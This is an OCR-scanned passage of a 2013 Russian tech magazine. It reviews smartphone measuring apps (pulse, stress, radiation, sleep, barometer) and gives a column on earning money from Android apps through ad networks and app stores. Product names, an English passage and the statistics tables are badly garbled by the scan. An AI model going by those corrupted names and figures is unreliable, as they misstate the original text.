зволяет одновременно включить фонарик. Также в приложении, кроме 
линейки, трех видов угломера и уровня, есть инструмент для измерения 
шага резьбы шурупов. Просто мечта плотника. 



точно определить наличие металлических предметов в карманах одеж- ВЕРДИКТ: тизі Ьаѵе! 
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Х-МОВІІЕ 



ЗреесІ Оип 1.2.5 

ОС: Ап(ігоі(1 1.6 и выше 
САЙТ: апсігоі(1Ьоѵ1.Ыод5ро1.ги 
ЦЕНА: бесплатно 

Еще одно приложение от Апсігоісі Воу, разработчика Вглагі Тооіз. Позво- 
ляет измерить скорость объекта с помощью камеры смартфона. Несмо- 
тря на название, работает по другому принципу, нежели стандартный 
полицейский радар, опираясь на простейшие законы геометрии. Понять 
эти законы легко, просто прочитав инструкцию по использованию, 
в которой сказано, что смартфон следует навести на объект, указать 
примерную дистанцию до этого объекта и удерживать на нем палец 
по мере перемещения. Другими словами, приложение просто измеряет 
скорость движения пальца по экрану и умножает результат на заданную 
удаленность объекта. 

Само собой, такой метод измерения скорости не может быть точным 
просто по определению, но удостовериться в работоспособности при- 
ложения было необходимо. Захватив с собой смартфон, я отправился 




к ближайшей дороге, запустил инструмент для измерения дальности 
до объектов из комплекта Втагі Тооіз, отмерил 20 метров, запустил 
Вреесі бип, вбил в него вычисленное расстояние и начал водить по ма- 
шинам пальцем. Примерная скорость оказалась от 28 до 34 киломе- 
тров в час — достаточно правдоподобный результат, если учитывать, 
что дальше по дороге поворот. С другой стороны, на глаз скорость была 
не больше 20-25 километров в час, что довольно сильно расходится 
с показаниями приложения. Однако это можно списать на недостаточно 
точно измеренное расстояние и на мой палец, который явно двигался 
по экрану с разной скоростью в разные моменты времени. 

ВЕРДИКТ: занятное, но слишком сложное для применения в реальных 
условиях приложение. Интересно в качестве игрушки, но не более того. 









Стандартам вопреки 



1п5(ап( НеаП Каіе 2.5.7 

ОС: Апсігоісі 2.1 и выше, І05 3.0 и выше 

САЙТ: ѵѵѵѵѵѵ.агитіо.сот 

ЦЕНА: бесплатно (62 рубля за Рго) 
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Іпзіапі Неагі Раіе — это приложение для измерения пульса с помощью 
камеры. В своей работе использует принцип функционирования меди- 
цинского прибора, названного «пульсоксиметр». Это та самая штукови- 
на, которую надевают на палец практически всех лежачих пациентов 
доктора Хауса; с помощью световой волны красного спектра и интен- 
сивности его отражения от капилляров пальца он способен точно опре- 
делить количество кислорода в крови (чем его больше, тем интенсивнее 
кровь поглощает свет), а заодно измерить пульс, регистрируя моменты 
наибольшего поглощения света во время прохождения «волн» крови 
по капиллярам. 

Рассматриваемое приложение, конечно, количество кислорода 
в крови не определит, но пульс замерить может — фиксируя цветовую 
насыщенность пальца, прислоненного к камере смартфона и подсве- 
ченного фотовспышкой. То есть ты просто прислоняешь палец к камере, 
а приложение после недолгого «обучения» начинает выводить на экран 
твой пульс, позволяя сохранить результат, а также отправить его на уда- 
ленный сервер. 

Честно говоря, я был убежден, что приложение подобного класса 
показать достоверные результаты не может. Все-таки в нормаль- 
ном приборе есть как источник света, так и его приемник с обратной 
стороны пальца, к тому же камеры смартфона и без того не высшего 
качества, а для подобных задач вообще не предназначены. Собственно, 
в случае со смартфоном Моіогоіа Ое!у все мои опасения подтвердились; 
приложение очень долго не могло «поймать» пульс, затем в течение не- 
скольких минут пыталось «удержать» его и в конце показывало какие- 
то совершенно дикие результаты в районе 110 ударов в минуту, притом 
что я спокойно сидел на диване. 

В случае с баіаху Мехиз ситуация оказалась прямо противополож- 
ной. Софтина за пару секунд поймала пульс и через несколько мгнове- 
ний выдала на экран вполне адекватный результат: 82 удара в минуту. 



50-60% Ыуоигтах Ымні га(е. 



51ау іп ІЬІ8 гопе і( уоік доЫ І8 (о Іо«е мгадЫ. Уои Ьосіу іа 
(иеМ Ьу 10% сагЬоЬудгаіев. 5% ргоіеіл апсі 85% ТЬе 
асіиаі пшпЬег Ы саіопеа Ьите<1 рег шіпиіе «ѵіІІ Ье Іеза 
Ніап іп Нідбег гопеа. Ьиі уои1І Ье аЫе Іо пиипіаш ехегсіае 
Іопдеі. 



70%-80% о1 уоиг шах ЬеаЛ га(е. 

АІао саІМ аегоЬіс гопе. Іп іНіа гопе уои'ІІ деі іЬе дгеаіезі 
ЬеаІіЬ Ьепеіііа оѵегаИ. Ѵоиг ЬеаП ап<1 кіпд сарасііу «пН 
іпсгеаае апЬ уоиг оѵегаП Гііпеаа «ѵгіі аіао іпсгеазе. ао 
уои'ІІ Ье аЫе Іо ехегсіае ккідеі. Ѵош Ьоду ціііі деІ 50% Ы 
уоиг саіогіеа (тот Іаі 50% (гот сагЬоЬудгаіеа. ап<1 ргоіеіп 
Ьит іміІІ Ье шіпітаі. 



80%-90% Ы уоиг шах ЬеагІ гаіе. 
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что вполне нормально для человека, только что выпившего большую 
кружку кофе. Следующие два повторных замера показали те же резуль- 
таты с разницей в один-два удара. Пульс, замеренный сразу после ра- 
боты с гантелями, оказался 93, что опять же близко к действительности. 
Чтобы окончательно развеять сомнения, я воспользовался домашним 
прибором для измерения давления и смог убедиться, что приложение 
показывает не просто адекватный, но и вполне реальный пульс, кото- 
рый соотносится с показаниями обычных приборов с разницей в два- 
четыре удара (что вполне можно отнести к погрешности). 

ВЕРДИКТ: тизі Наѵе при наличии смартфона с более-менее нормальной 
светочувствительностью камеры и соблюдении всех условий работы 
с приложением (палец должен быть абсолютно неподвижен и прижат 
к камере не слишком плотно). 
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(ог 50000 рбу/Ь» в соответствующие поля в настройках Расііоасііѵііу 
Соипіег. Эти цифры как раз и будут служить показателем соотношения 
«уровень шума — уровень излучения» для алгоритмов приложения. 



причем первый из них — это шум самой матрицы, который может от- 
личаться в разных смартфонах одной модели (производители, напри- 
мер, часто меняют матрицы и некоторые другие комплектующие по мере 
жизни модели), поэтому рекомендуется замерить это значение, запустив 
приложение и протестировав уровень излучения в течение 5-60 минут 
(чем больше, тем лучше). 

К сожалению, протестировать лично Расііоасііѵііу Соипіег у меня 
не получилось, так как под рукой не оказалось ни материалов для ис- 
следования, ни подходящего смартфона (согласно таблице, каче- 
ство измерения 6а)аху Мехиз — две звезды, а это значит, что на нем 
результаты будут неадекватны реальности). Тем не менее, если верить 
словам знающих людей, приложение не только технически обосновано, 
но и реально работает, позволяя если не замерить точно, то опреде- 
лить наличие радиации. Для тех, кто решил протестировать софтину 
самостоятельно, сообщу, что кальцинированная сода и советские часы 
со светящимся в темноте циферблатом дают достаточное для регистра- 
ции приложением излучение. 

ВЕРДИКТ: работоспособное приложение, качество измерений которого 
было подтверждено с использованием профессионального оборудова- 
ния. 





Х-МОВІІЕ 



Зтагі АІагт 3.3 

ОС: Апсігоіс1 1.6 и выше 
САЙТ: ѵѵѵѵѵѵ.ѵаипіх.сот 
ЦЕНА: бесплатно 




В 1953 году Натаниэль Клейтман и Юджин Асеринский, работавшие в Чи- 
кагском университете, открыли интересный феномен, связанный со сном 
человека. Как оказалось, сон вовсе не равномерен, он делится на две 
фазы: быстрого и медленного сна, которые последовательно сменяют 
друг друга на протяжении ночи. Так вот, оказалось, что человек видит сны 
только во время фазы быстрого сна, когда активизируется мозг, при этом 
начинают вращаться глазные яблоки, а человек переворачивается с бока 
на бок и непроизвольно выполняет другие движения. Позже выяснилось, 
что пробужденный во время фазы быстрого сна человек просыпается 
гораздо быстрее и чувствует себя намного лучше, чем даже если бы 
он проспал дольше, но проснулся во время фазы медленного сна. 

Несколько лет назад фирма Іппоѵаііѵе БІеер Зоіиііопз воплотила 
в действительность идею легкого пробуждения из быстрого сна, создав 
часы ЗІеерТгаскег, которые реагируют на движения спящего человека 
и таким образом определяют, что наступила фаза быстрого сна. Пользо- 
ватель просто устанавливает временной промежуток, в который он хотел 
бы проснуться, а часы «ловят» быстрый сон и будят владельца в нужный 
момент. Часы имели успех, и вскоре появилось приложение еазуѵѵакеир 
для І05, основанное на той же идее, а позже — и аналоги для Апсігоісі. 

5таг1 АІагт — один из таких аналогов. Внешне это простой будиль- 
ник, в котором время задается приближенно. Достаточно указать нужное 
время, положить смартфон рядом с собой на кровать и спокойно уснуть. 

С помощью акселерометра 5таг1 АІагт будет регистрировать колебания 
кровати, когда ты начнешь ворочаться, и таким образом установит пере- 
ход в фазу быстрого сна. Вроде бы все просто. 

Однако, когда-то загоревшись идеей подобного будильника, я долго 
мучился, перебирая различные аналоги из маркета и калибруя чувстви- 
тельность каждого из них, но так и не добился приемлемого результата. 
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Основная проблема состояла в том, что я просыпался в самом начале 
временной рамки, то есть не когда наступал быстрый сон, а просто 
в начальное время для пробуждения. Калибровка помогала мало, по- 
этому я решил, что просто слишком много ворочаюсь и такой будильник 
не для меня. Вторая проблема — аккумулятор. Приложение собирает ста- 
тистику всю ночь для более точного определения фаз, поэтому половина 
заряда улетала в никуда. Ну и в качестве «бонуса» оказалось, что боль- 
шинство Смартов отрубают датчики, когда подсветка экрана активна, 
так что приходилось держать экран включенным, да еще и присоединять 
зарядник на ночь. 

ВЕРДИКТ: может стать неплохим будильником лично для тебя, но требует 
калибровки и тестирования. 



3(ге55 СЬеск 1.0.1 

ОС: Апсігоісі 2.2 и выше, І05 4.0 и выше 
САЙТ: ѵу/ѵѵѵѵ.агитіо.сот 
ЦЕНА: бесплатно 

Еще одно приложение от Агитіо — признанного лидера в разработке 
фитнес-приложений. На этот раз Бігезз СЬеск — инструмент, позво- 
ляющий измерить текущий уровень стресса. Работа основана на том 
же принципе, что и Іпзіапі Неагі Раіе, плюс приложение выявляет 
нарушения ритма сердца, возникающие в стрессовых ситуациях, 
и выводит результат в процентах с пояснением. По заявлению разра- 
ботчиков, алгоритм действия Бігезз СЬеск основан на рекомендациях 
Европейского общества кардиологов и Североамериканского обще- 
ства стимуляции и электрофизиологии. 

Уже успев поработать с Іпзіапі Неагі Раіе, от этого приложения 
я не ожидал особенных проблем, и не ошибся. Находясь в спокойном 
состоянии на все том же любимом диване, я эапустил софтину, при- 
слонил палец к камере и подождал положенные две минуты. На экран 
был выдан результат — 17% с пояснением, смысл которого можно 
передать примерно так: «все ОК, парень, продолжай в том же духе». 
Второй замер я сделал сразу после получения известий о важном 
для меня событии. На этот раз результат оказался равным аж 67%, 
а пояснение сообщало, что я взволнован и лучше бы мне прилечь 
на диван и сделать несколько глубоких вдохов. Информация, как мне 
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кажется, вполне правдоподобная, однако что с ней делать, я так 
и не придумал. 

ВЕРДИКТ: рабочий, но бесполезный инструмент. 
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ЗуРге55иге 1.14 



ОС: АпсігоісІ 2.3.3 и выше 

САЙТ: нет 

ЦЕНА: бесплатно (40 рублей за Рго) 




Начиная с баіаху Мехиз, компания Затзипд оснастила свои смартфоны встроен- 
ным электронным барометром. Идея, казалось бы, противоречивая, но в Затзипд 
хотели сделать определение местоположения по А-6Р5 более точным, с привле- 
чением не только мобильных и ^і-Рі-сетей, но и показателя высоты над уровнем 
моря, который получают с помощью барометра. При этом приложения для просмо- 
тра атмосферного давления в смартфонах не было, впрочем, сторонние разработ- 
чики создали его спустя некоторое время. 

ЗуРгеззиге показывает атмосферное давление в пяти различных системах из- 
мерения (в том числе в миллиметрах ртутного столба — ттНд), кроме того, он спо- 
собен предсказывать изменение погоды (и уведомлять пользователя), а также 
выступать в роли альтиметра, который, правда, доступен только в платной версии. 
Все это работает, причем без задействования интернета. 



ВЕРДИКТ: отличное приложение для тех, кто решил отправиться в путеше- 
ствие, и просто для энтузиастов. Работает на смартфонах Саіаху Мехиз, 
баіаху 5 III, баіаху Моіе. 
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ВЫВОДЫ 



Современный смартфон — это не просто 
карманный компьютер со встроенным 
радиомодулем, это настоящий цифровой 
комбайн, который можно использовать 
для самых разных задач, от строительных 
работ до измерения уровня радиации. 
Большинство из инструментов, конеч- 
но, не точны и не могут быть заменой 
специализированным профессиональным 
приборам, однако они выручат тебя тогда, 
когда под рукой не будет ничего, кроме 
смартфона, з: 



в маркете можно найти множество 
абсурдных приложений, вроде сканера 
отпечатков пальцев, солнечной батареи, 
прибора ночного видения и прочего. Все, 
что ты в них найдешь, — это реклама 
и вирусы. 



Автор 1п$(ап( Неаг{ Ва(е, компания 
Агитіо, также разработала приложение 
Сагсііо Вис1(]у, способное определять 
пульс по изменению цвета участков 
лица. К сожалению, оно доступно только 
для І05. 









РОБОТ, 

НЕ СПАТЬ! 




В преддверии выпуска смартфона баі- 
аху $ ІІІ компания Батзипд запустила 
несколько рекламных роликов, в которых 
была показана функция 5таг( 3(ау нового 
смартфона, позволяющая не заботиться 
о том, что экран может погаснуть 
в самый неподходящий момент. Девайс 
использует фронтальную камеру, чтобы 
следить за глазами пользователя, 
блокируя отключение экрана на время, 
пока глаза открыты, и автоматически 
отключать экран, если они закроются 
(пользователь уснул, например). 

Совсем скоро после выхода рекламного 
ролика в свет в боодіе РІау появилось 
приложение ІЗееѴои, реализующее 
аналогичную функциональность на любом 
смартфоне, работающем под управлением 
АпсігоісІ 2.3 и выше. Достаточно просто 
скачать приложение, запустить и тапнуть 
по чекбоксу «Зіагі ІЗееѴои зегѵісе». 

После этого в строке состояния появится 
иконка — открытый или закрытый глаз. 
Приложение действительно работает. 
После запуска ІЗееѴои начинает следить 
за тобой, что легко заметить по глазу 
в строке состояния, который моргает 
в унисон с твоими глазами и закрывается, 
если закрыть камеру пальцем. Другое 
дело, что приложение слишком часто 
дает сбои, считая, что глаза закрыты, 
даже если это не так. Поэтому весь 
полезный эффект сходит на нет, вместе 
с зарядом батареи и возможностью 
использования камеры. Причем не важно, 
задней или передней. На АпсігоісІ 4.2 
ІЗееѴои отказалась работать вовсе, никак 
не реагируя на положение век. 







Х-МОВІІЕ 



Павел Щедухин (ипІуіпдОдтаіІ.сотІ 



РАСКРУТИТЬ 
И ЗАРАБОТАТЬ 




КАК РАСПРОСТРАНЯТЬ 
АНОЯОІО-ПРИЛОЖЕНИЯ 
И ПОЛУЧАТЬ ПРИБЫЛЬ 

АпсІгоісІ — одна из самых доступных платформ для разработки 
приложений. Писать можно практически на любом языке про- 
граммирования, протестировать на реальном устройстве не со- 
ставит никакого труда, распространение доступно бесплатно. 

В статье мы рассмотрим, как можно заработать на своих при- 
ложениях, какой из способов монетизации лучше использо- 
вать, где распространять свой софт и что для этого необходимо. 



МОНЕТИЗАЦИЯ 



Прежде чем писать, решим — а стоит ли? На- 
сколько реально заработать на приложениях 
для АпсІгоісІ? Можно выделить четыре основ- 
ных способа обогатиться, создавая приложе- 
ния для мобильной системы от боодіе. 



Продажи приложений. Кажется, что это 
самый простой способ. Сделал, поставил цену, 
люди покупают, ау нас на счету копятся деньги. 
Все бы так, но экосистема АпсІгоісІ такова, 
что пользователям доступно большое количе- 
ство бесплатных приложений самого разного. 



втом числе высокого качества. Поэтому, чтобы 
получить сколько-нибудь серьезные продажи, 
твоя программа должна обладать настолько 
сильным конкурентным преимуществом, чтобы 
юзеры захотели ее купить. На практике ока- 
зывается, что простым разработчикам сложно 
добиться удовлетворительных продаж. Топы 
платных приложений оккупированы мощными 
компаниями. 

Внутриигровые покупки. В зтом случае 
приложение распространяется бесплатно, 
но пользователям предоставляется возмож- 
ность приобрести себе что-нибудь в процессе 
игры. Это можетбыть внутриигровая валюта, 
доступ к дополнительным уровням и подобное. 
Главная твоя задача — заинтересовать геймера 
так, чтобы он хотел проводить в игре как можно 
больше времени и совершать покупки. Еще 
очень важно не отпугнуть пользователей не- 
возможностью играть без покупок, особенно 
на ранней стадии игры. Лучше позволитьиграть 
и бесплатно, но сделать прогресс прохождения 
намного более медленным. Иначе приложение 
получитбольшое количество отрицательных 
оценок. Это неплохой способ, но качество 
приложения оченьсильно влияетна покупки. 
Самые внушительные внутриигровые продажи 
на андроиде достаются онлайн-играм. 



050 



ХАКЕР 02/169/2013 





Раскрутить и заработать 




Интерфейс разработчика боодіе РІау 



Фриланс. Многиезабываютоб этом способе 
заработка. Тем не менее не стоит совсем от- 
брасывать вариант разрабатывать программу 
на заказ. С одной стороны, ты будешь ограничен 
в получении средствтолько оговоренной сум- 
мой, зато она будет гарантирована иты получишь 
ее в полном объеме сразу. Не придется искать 
ресурсы для приложения, идеи, заниматься 
продвижением. Твои действия сведутсятолько 
к разработке. Главная задача— получить заказ. 

Реклама. Существует множество сетей, пре- 
доставляющих рекламный контент для мобиль- 
ных устройств. Кто-то способен предоставлять 
рекламу по каждомузапросу, вторые даютболь- 
ше денег, третьи предлагаютальтернативные 
способы отображения. Часто твой доход будет 
зависетьотрасположения рекламы итипа при- 
ложения. Некоторыеспособны вызывать клики 
на каждый пятый показ, а где-то будет меньше 
одного приносящего доход действия на сотню 
баннеров. Поэтому говоритьдаже примерно, 
сколько принесет приложение, имеющее какое- 
то определенное количество пользователей, 
нельзя. Важное правило; реклама не должна 
заслонять элементы управления. Это нарушает 
договор и вызывает раздражениеу юзеров. 



РЕКЛАМНЫЕ СЕТИ 



АсІМоЬ. Самый распространенный и простой 
провайдер рекламного контента, купленный 
компанией боодіе в 2009 году за 750 милли- 
онов долларов. Удобен тем, что руководство 
по внедрению 50К есть для любого фреймвор- 
ка, на чем бы ты ни писал. Способен обеспе- 
чивать ЯП гаіе 99,99%. Это значит, что реклама 
будет показана каждый раз, когда ее запра- 
шивает приложение. Самый главный недоста- 
ток — очень низкая стоимость кликов. Средняя 
цена клика колеблется между одним и полу- 
тора центами. Поэтому, чтобы заработать 
нормальные деньги, понадобится очень много 
кликов, даже учитывая, что большинство кли- 
ков будут случайными. Вывод денег несложен, 
но частота выплат всего раз в месяц. 

АігризН. Второй по величине рекламный 
сервис для Апбгоісі-устройств. Это та самая 
зараза, которая показывает рекламные уве- 
домления в строке состояния твоего девайса. 

С ней боролись все, в том числе и боодіе, однако 
с выходом последнего 50К дело стало получше. 



так как теперь реклама удовлетворяет требо- 
ваниям поискового гиганта. Тем не менее есть 
проблемы в статистике, много отзывов об от- 
кровенном «воровстве» кликов. В целом доход 
будет не ниже, чем с АбМоЬ, но вывести деньги 
немного сложнее, придется использовать сер- 
висы посредников. Некоторые антивирусы все 
еще воспринимаюттакую рекламу как вирус. 

ІеасіЬои. Сервис, который пошел по стопам 
АігризЬ, показывая схожую рекламу, и спосо- 
бен приносить значительно большие деньги, 
чем АсІМоЬ. К сожалению, сильно испортил 
себе репутацию, отказывая в выплате; от этой 
сети вполне может прийти сообщение о том, 
что рекламодатель оказался недобросовест- 
ным и не оплатил рекламу, в связи с чем твой 
доход (уже заработанные деньги) упадет в три 
раза. РіІІ гаіе часто не достигает 90%. Тем 
не менее все еще популярен. 

АсІ\ѴЫгІ. Сеть появилась в те времена, когда 
АсІМоЬ не мог обеспечить показы рекламы 
по каждому запросу. Суть сводилась к объ- 
единению различных рекламных провайдеров 
для достижения максимального показателя за- 
полнения сообщениями. Если АсІМоЬ не мог по- 
казать баннер, то запрос отправлялся второму 
провайдеру, если и ему нечего было предоста- 
вить— третьему. Сейчас эта проблема не так 
актуальна, и Асі^ЫгІ теряет популярность. 



СПОСОБЫ РАСПРОСТРАНЕНИЯ 
ПРИЛОЖЕНИЙ 



После того как приложение разработано, 
способ монетизации выбран, появляется 
вопрос, как же его доставить до пользова- 
телей. Способов много, но из действенных 
стоит обратить внимание на магазины прило- 
жений, из которых пользователи скачивают 
программы на свои устройства. Таких марке- 
тов существует много, и постоянно появля- 
ются новые: операторы связи создают свои, 
производители устройств — свои, создаются 
независимые. Несмотря на то что функ- 
цию все выполняют одну, различия между 
магазинами бывают существенные. Далее 
во врезке мы подробно расскажем о каждом 
из них. Сейчас же ограничимся краткими 
тезисами. 



ЧТО ВЫБРАТЬ? 



Сравнивая все маркеты, стоит признать, 
что почти всегда боодіе РІау лучше своих 
аналогов. Можно, конечно, загрузить свое 
приложение во все магазины, чтобы охватить 
наибольшую аудиторию. Но и поддерживать 
тоже придется все: делать для каждого 
маркета свои иконки, заливать обновления. 
Поначалу кажется, что это несложно и за- 
нимает немного времени. И скорее всего. 



ОеІаіІесІ АсііѵКу; 2012/11/28 - 2012/11/28 



ЗКеМаше 





Кеѵепое ^ 


еСРМ 1 Яеоиеві» 1 


Ітргеміолв 


Рійаіе Ск*»~Г 


ст 


гвЬиаввел 


2012/11/28 


80.00 


80.00 


12 


12 


100.00% 


0 


0.00% 


п«Ю\меепгиппег 


2012/11/28 


80.01 


80.32 


19 


19 


100.00% 


1 


5.26% 


геЬивмг 


2012П1/28 


82.15 


80.82 


2.609 


2,609 


100.00% 


204 


7.82% 


гіскутопіоеу 


2012/11/28 


80.01 


80.11 


54 


54 


100.00% 


1 


1.85% 


тороп 


2012/11/28 


80.00 


80.00 


482 


482 


100.00% 


0 


0.00% 


оіутлріс 


2012/11/28 


80.00 


80.00 


0 


0 


0.00% 


0 


0.00% 


гаріск 


2012/11/28 


80.18 


80.65 


276 


276 


100.00% 


13 


4.71% 


СаСасігт 


2012/11/28 


80.00 


80.00 


1 


1 


100.00% 


0 


0.00% 


Ріскир 


2012Ж/28 


80.00 


80.00 


1 


1 


100.00% 


0 


0.00% 


ецго2012 


2012/11/28 


80 07 


81.58 


42 


42 


100.00% 


7 


1667% 



Статистика доходов от показов рекламы через АсІМоЬ 
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Х-МОВПЕ 




ОДНО ПРАВО 
НА ОШИБКУ 



Если Соодіе поймает тебя на нарушении 
каких-либо правил, то на первый раз 
все ограничится строгим, но пред- 
упреждением (конечно, зависит от того, 
что ты сделал). Это плохо, но не фаталь- 
■ но. А вот последующее «преступление» 
?! ^ будет последним. И в боодіе не будут 
' смотреть на то, что с предыдущего про- 
шло уже несколько лет. Поэтому читай 
правила внимательно и проверяй свои 
приложения на соответствие им. 



правильно будет начать именно с загрузки 
в наибольшее количество магазинов. Тогда 
ты сам сможешь оценить отдачу от каждого 
и трудоемкость оформления публикации. 
Потом ты заметишь, что при выкладывании 
одновременно во все маркеты теряются за- 
грузки с того, на который сделан основной 
упор, что хуже для ранжирования в поиске 
и различных топах. 

Для себя я определил, что изначально 
приложение должно быть выложено в боодіе 
РІау, а через две-четыре недели можно вы- 
кладывать в альтернативные маркеты, из ко- 
торых лучше себя показывает ЗІісІеМЕ. 



ЗАКЛЮЧЕНИЕ 



Написав приложение, которое понравится 
пользователям, ты сможешь заработать не- 
плохие деньги и заложить основу для буду- 
щих релизов. Главное — не останавливаться 
и продолжать писать программы, и какая-то 
из них обязательно «выстрелит». Инди-разра- 
ботчикам не стоит ориентироваться на такие 
компании, как Роѵіо, и ожидать многомил- 
лионных закачек. Часто сто тысяч загрузок 
за месяц уже являются хорошим результатом. 
Не забывай про продвижение приложения 
в Сети, пиши обзоры, рассказывай о нем 
на форумах. I 



Прил< 




Ребусы 

ѵегзіопМате 14 
ѵегзіопСоде 5 



Поддерживаемые языки язык по умолчанию 



Звезд 5 НВННІ 


■■ 942 


Звезд 4 ■ 


93 


Звезд 3 1 


40 


Звезд 2 


16 


1 звезда 1 


36 



Оценки "Ребусы** в боодіе РІау; пока у приложения все отлично 




РЕКОМЕНДАЦИИ ^ 

по ОФОРМЛЕНИЮ 
ПУБЛИКАЦИЙ В МАРКЕТЕ 

Оформление публикации имеет боль- 
шое значение. Особое внимание необхо- 
димо уделить заголовку и иконке, так 
как именно по ним пользователь будет 
определять интересность приложения. 
Текст описания влияет на видимость 
программы в поиске маркета, исполь- 
зуй ключевые слова. 



Всего установок (лопьзоватепейустрана 

-моео 

'замо 

ммо 

40 Мв 


юііаетг 








’.’.ги: 


Всего установок (пользователей) - ?б.1 1.2012 


ВАШ ПРИЛОЖІИМ 


вес приложения в 

РАЗЛМС 

головоломки 


10 СТРАНЫ В КОТОРЫХ популярен раздел 
головопоики 


Р ■ Россиа 


127 3$3 


92.00% 


2.47% 


США 


22^7% 


Р ■ Украина 


6 430 


4.64% 


0.37% 


Реслубпика Корея 


0.83% 


Казахстан 


2266 


1.64% 


0,10% 


Япония 


4.22% 


Беларусь 


1473 


1.06% 


0,13% 


Германия 


3.43% 


■ Геркамня 


66 


0.05% 


3.43% 


Великобритания 


3.17% 


Таиланд 


52 


0.04% 


1.13% 


Испаиия 


2.84% 


Г ■ Молдова 


50 


0.04% 


0.02% 


Тайвань 


2.56% 


Г ■ Узбекистан 


47 


0.03% 


0.02% 


Россия 


2.47% 


Г ■ Латвия 


46 


0.03% 


0.05% 


Франция 


2.35% 


■ Другое 


646 


0.47% 




Италия 


1.83% 



Статистика скачиваний по странам из боодіе РІау 



КАКОЙ МАГАЗИН ПРИЛОЖЕНИЙ ЛУЧШЕ? 



6ОО01Е РІАУ 



Сайт: Ьир5://рІаѵ.доодІе.сот/5^оге 
Требования: два скриншота, 
иконка 512 512 и 25 долларов 
Плюсы: огромный рынок, быстрая 
регистрация, отсутствие пре- 
модерации приложений, много 
разделов, попадание в которые 
приводит к увеличению загрузок. 
Минусы: платная регистрация, вы- 
сокая конкуренция. 



АМА70М АРР5Т0РЕ 



Сайт: ѵѵѵѵѵѵ.атагоп.сот 
Требования: веб-сайтителефон 
для поддержки пользователей, 
иконка 114 X 114, иконка 512x512, 
три скриншота 

Плюсы:бесплатный годразме- 
щения. 

Минусы: ежегодные платежи, дол- 
гая премодерация, мало пользова- 
телей, не работает в России. 



5Ы0ЕМЕ 



Сайт: 5Іісіете.огд 
Требования: иконка 150 х 150, 
скриншот 

Плюсы: бесплатная регистрация, 
второй по количеству пользовате- 
лей маркет для Апсігоісі. 
Минусы:дотошная модерация, 
пользователи крайне редко остав- 
ляют комментарии, подходиттоль- 
кодляприложенийсрекламой. 



БАМБУМЭАРРБ 



Сайт: V. . - а -у. 3 1. п а л г р у . : т 

Требования: четыре скриншота, 
иконка 135 X 135 

Плюсы: бесплатная регистрация, 
модераторы выполняют роль 
тестеров приложения. 

Минусы: длительная проверка 
приложения, аудитория ограниче- 
натолько владельцамителефонов 
фирмы Багпзипд. 
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Раскрутить и заработать 



60061Е РІАУ 



Самый большой магазин приложе- 
ний для АпсІгоі(і. Больше всего поль- 
зователей, больше всего приложе- 
ний. Предустановлен в большинстве 
устройств на Апс1гоі(і 05. Один 
из немногих маркетов, требующих 
деньги за регистрацию. Необходим 
однократный платеж в размере 
25 долларов. После оплаты твои 
данные начнет проверять боодіе. 
Обычно этот процесс занимает 
не больше дня. Если проверка за- 
тянулась, лучше написать в техни- 
ческую поддержку. После проверки 
ты получишь возможность выклады- 
вать свои приложения, и буквально 
через несколько часов они уже будут 
доступны для скачивания. 

Важная особенность Ооодіе 
РІау — премодерация приложений 
отсутствует. Это позволяет быстро 
доставлять приложения и обнов- 
ления до пользователей. Позиция 
твоего приложения зависит от коли- 
чества скачиваний, средней оценки 
и количества оценок. Поэтому важно 
как-то напоминать пользовате- 
лям, что неплохо бы оценить твое 
творение. Однако не стоит делать 
это навязчиво. Также по правилам 
нельзя предлагать бонусы за оцен- 
ки. Интерфейс просмотра статисти- 
ки скачиваний удобнее и предо- 
ставляет больше информации, 
чем аналоги от других компаний. 

Еще одна особенность — можно 
перевести текст описания сразу 
на все доступные языки, используя 
сервис боодіе Тгапзіаіе. Даже такой 
перевод зачастую приносит больше 
скачиваний, чем английский текст 
для всех регионов. 

За первый месяц мое приложе- 
ние «Ребусы» скачали более 75 ты- 
сяч человек. А пиковое количество 
загрузок пришлось на следующий 
день и достигло 10 тысяч за день. 
Этому помогло одно из первых 
мест сразу в нескольких топах: 
набирающие популярность, новые 
приложения, головоломки. После 
того как приложение перестало 
быть «новым», количество загрузок 
постепенно упало, теряя 500-1000 
скачиваний в день. Мои приложе- 
ния, не присутствующие высоко 
в рейтингах, качают 200-300 раз. 



АМА20М АРР5Т0РЕ 



Магазин Атагоп довольно из- 
вестен. Во многом этому поспо- 
собствовала популярная акция — 
раздавать платные приложения 
бесплатно. Каждый день тысячи 



пользователей заходят и скачивают 
новую платную программу на халя- 
ву. Впоследствии родилось множе- 
ство слухов о том, что Аглагоп якобы 
платит разработчикам за каждое 
загруженное таким образом при- 
ложение. На самом деле это не так. 
Ата70п просто говорит, что ты полу- 
чил невероятное промо и должен 
быть рад, ведь в акции участвовали 
большие компании. И по договору 
они ничего не нарушают, хоть и на- 
писан он слегка путано. 

Также на популярных зарубеж- 
ных ресурсах можно найти статьи 
с откровенным пиаром Атагоп, где 
его называют спасителем Апсігоісі 
и сравнивают с І05 Арр $1оге. В ка- 
честве аргументов приводится соот- 
ношение количества пользователей 
к количеству купленных приложе- 
ний, которое больше, чем в боодіе 
РІау. Примерно в три-четыре раза 
больше. Это отлично и могло бы 
быть серьезным преимуществом, 
вот только пользователей в Атагоп 
Аррзіоге меньше в сотни раз. 

К этому можно добавить очень дол- 
гий срок модерации приложения: 
с момента оформления публикации 
до утверждения часто проходит 
больше недели. То же самое будет 
и с обновлениями. Когда ты обно- 
вишь приложение на боодіе РІау, 
то сразу начнешь получать гневные 
письма пользователей амазона 
о том, что им до сих пор приходится 
довольствоваться старой версией. 
Тем не менее просматривают прило- 
жения хотя и долго, но не слишком 
внимательно или уж очень лояльно, 
так как спокойно могут пропустить 
софт, содержащий ссылки на другие 
маркеты. Ну и последний гвоздь: ус- 
ловно бесплатная регистрация. За- 
дарма распространять приложение 
получится только год, впоследствии 
придется вносить ежегодную плату. 

Г оворить о количестве загрузок 
в Атагоп Аррзіоге даже как-то 
неловко. Если сравнивать с боодіе 
РІау, кажется, что этот магазин 
просто не работает. Когда в главном 
Апсігоісі-маркете приложение до- 
стигает первой тысячи скачиваний, 
амазон может похвастать... тремя. 
Конечно, многое зависит от при- 
ложения, бывают случаи более 
обнадеживающие. Например, одно 
из моих приложений скачали всего 
(!) в 15 раз меньше, чем в магази- 
не компании боодіе. В целом все 
довольно грустно, но простенькие 
игры можно выкладывать, некоторое 
количество загрузок будет. Русско- 



язычные приложения публиковать 
в Атагоп Аррзіоге не имеет никако- 
го смысла независимо от качества 
и популярности в других маркетах. 



51І0ЕМЕ 



Этот магазин не связан ни с какой 
крупной корпорацией, но именно его 
можно назвать вторым по величине 
маркетом. Причина в том, что более 
